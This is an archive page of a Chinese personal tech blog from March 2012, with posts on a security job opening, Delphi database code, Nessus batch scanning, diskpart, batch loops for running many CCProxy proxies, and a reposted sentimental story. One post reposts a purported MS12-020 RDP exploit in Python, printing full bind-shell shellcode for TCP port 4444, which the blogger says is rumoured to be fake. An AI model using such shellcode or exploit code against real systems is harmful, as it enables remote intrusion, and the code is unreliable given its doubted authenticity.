存档

2012年3月 的存档

盛大支付招聘安全工程师

2012年3月31日 5 条评论

职位描述:

1、应用系统安全测试

2、定期的安全风险评估和检测

3、跟踪和分析新的安全漏洞、安全技术

职位要求:

1、熟悉WEB安全

2、具有一定的编程能力

3、熟悉linux/windows系统

4、有良好的团队合作精神,有责任感,有较好的沟通能力,主动性强

优先条件:

1、有java编程经验,熟悉各种开源框架

2、有支付行业经验

工作地点:上海

联系方式:dulei.lewis[AT]snda.com

分类: 求职招聘 标签:

Delphi下Listview与数据库关联

2012年3月29日 1 条评论

procedure TForm1.Button1Click(Sender: TObject);
begin
listview1.clear;
with adoquery1 do
begin
Sql.text := ‘Select * from 表';
Open ;
while not eof do
begin
with listview1.items.add do
begin
caption := fieldbyName(‘字段’).asstring;
subitems.add(fieldbyName(‘字段’).asstring);

subitems.add()…….

end;
Next;
end;
end;

分类: Delphi, 学习记录 标签:

Nessus自动化批量扫描

2012年3月25日 4 条评论

Nessus是一款安全研究人员比较常用的系统漏洞扫描与分析软件,提供完整的电脑漏洞扫描服务, 并随时更新其漏洞数据库。

唯一的不足点就是他不是完全免费的,分HOME版和Professional。

HOME版本每次只能扫描30个IP,这样的话对于安全人员来说,如果扫描对象过多,那么重复性工作就很烦了,因此有了此脚本。

注意:

1、使用前需先配置好将要扫描的IP文件,可以是一个IP一行,也可以是以IP段。

2、例:10.1.1.1 ,也可以10.1.1.1-10.1.1.30,记住只能30个IP,可以配置多个IP文件,如1-30.txt,31-60.txt,脚本会循环读取。

3、扫描完成后会将扫描结果保存在以当前日期为单位的目录中。

4、使用前需先添加一个Nessus用户,并配置好此用户策略,扫描时将使用此用户及用户策略。

5、使用前需配置好Nessus环境变量,或者将本脚本放至Nessus.exe所在目录。

6、扫描结果不太好集中分析,若哪位有好的办法,请联系我。

Command:

nessus.exe -q localhost 1241 用户名 密码 ip段文件.txt -o 保存路径/xxx.html

下载地址:Nessus自动化脚本.zip

命令行下激活磁盘

2012年3月25日 1 条评论

1、进入命令行执行diskpart

2、select disk 0(选择需要激活的Disk ID)

3、执行命令online,OK~~~

 

分类: 技术文档 标签:

Delphi连接Mysql数据库

2012年3月25日 1 条评论

以前一直使用Dephi的ADOconnection控件连接SQLserver,最近需要做一个程序数据库为mysql,研究了一阵子,总结下方法。

依然老组合,ADOconnection、ADOQuery以及Datesource。

首先在Form初始化时加入如下代码:

try
ADOconnection1.Close;
ADOconnection1.ConnectionString:=(‘DRIVER={MySQL ODBC 3.51 Driver};’+
‘SERVER=localhost;’+
‘DATABASE=test;’+
‘USER=root;’+
‘PASSWORD=xxxqqq;’+
‘PORT=3306;’+
‘OPTION=3;’);
ADOconnection1.open;
except
on e:Exception do
ShowMessage(e.Message);
end;

这样就连到了本地的MYSQL数据库。

之后的使用方法和Sql的相同。

MS10-020(RDP远程溢出EXP)

2012年3月15日 1 条评论

网上这个转的很厉害,不知真假,收藏先。

据说假的,FreeRDP这个模块…..

#!/usr/bin/env python
#############################################################################
#   MS12-020 Exploit
#
#   Uses FreeRDP
#############################################################################
import struct
import sys
from freerdp import rdpRdp
from freerdp import crypto
from freerdp.rdpRdp import  rdpNego
#bind shellcode TCP port 4444
shellcode  = '\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
shellcode += '\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9'
shellcode += '\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56'
shellcode += '\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22'
shellcode += '\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30'
shellcode += '\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81'
shellcode += '\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42'
shellcode += '\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22'
shellcode += '\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9'
shellcode += '\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79'
shellcode += '\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab'
shellcode += '\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa'
shellcode += '\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48'
shellcode += '\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1'
shellcode += '\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0'
shellcode += '\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe'
shellcode += '\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9'
shellcode += '\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84'
shellcode += '\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56'
shellcode += '\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8'
shellcode += '\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79'
shellcode += '\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6'
shellcode += '\xba\xb5\x60\x56\x39\x4a\xb6\xa9'
#Payload

阅读全文…

分类: 安全工具 标签: ,

嵌套3个For循环并同步循环

2012年3月14日 4 条评论

来由:

今天有朋友让我帮忙写个脚本,他有一台服务器,服务器设置了255个Wan网ip。

现在他想运行多个CCProxy代理(SOCKS),并通过不同IP、不通端口来执行。经测试,需修改配置文件CCProxy.ini中的一些值,

1、SOCKS | 2、Admin | 3、ServerBindIP

条件是,SOCKS:8010依此类推到8110,Admin:110 依此类推到210,IP:10.10.10.10 依此类推到10.10.10.110。

思考后,可用的方法是,先配置一个CCProxy.ini模版,删除以上提到的那些值,然后循环创建CCProxy.ini并根据变量循环将配置信息追加入,然后创建并copy到以IP结尾的目录中,执行。

很显然,使用批处理FOR循环就可以做到,如:

for /l %%a in (8010,8110) do (echo %%a)

以上一句代码输出从8010到8110这100个数字,即满足条件1.如果三个同时要修改入CCProxy.ini呢?

但是试了下这样是不行的:

for /l %%a in (8010,8110) do (echo %%a)

for /l %%b in (110,210) do (echo %%a)

for /l %%c in (10,110) do (echo %%a) 阅读全文…

[转]老公,我把咱爹娘接来了!感动15亿人

2012年3月8日 4 条评论

结婚那天,酒店门前车水马龙.
妈妈问我:坐在角落里象两个要饭模样的人是谁?
我看过去的时候,有个老头正盯着我,旁边还有个老太太,发现我看着他们时赶忙低下头。我不认识他们但也不象要饭的,衣服是新的连折印都看得出来。妈说象要饭的是他们佝偻着身子,老太的身边倚了根拐杖的缘故。
妈说天池是孤儿,那边没亲戚来,如果不认识就轰他们走吧。现在要饭的坏着呢,喜欢等在酒店门口,见哪家办喜事就装作亲戚来吃黑酒。
我说不会,叫来天池问一下吧?天池慌里慌张把我的手捧花都掉地上了,最后吱吱唔唔地说是他们家堂叔和堂婶。我瞪了妈妈一眼:差点把亲戚赶走。
妈说天池你不是孤儿吗?哪来的亲戚呢?
天池怕妈,低头说是他家远房的亲戚,好长时间不来往了。但结婚是大事,家里一个亲戚没来心里觉着是个憾事,所以……
我靠着天池的肩埋怨他有亲戚来也不早说,应该把他们调一桌,既然是亲戚就不能坐在备用桌上。
天池拦着说就让他们坐那吧,坐别桌他们吃着也不自在。
直到开席那桌上也就坐了堂叔和堂婶。敬谢席酒经过那桌,天池犹豫了一下拉着我从他们身边擦了过去。回头看到他们的头埋的很低,想了想我把天池给拽了回去:堂叔、堂婶,我们给你俩敬酒了! 阅读全文…

分类: 情感生活 标签:
普人特福的博客cnzz&51la for wordpress,cnzz for wordpress,51la for wordpress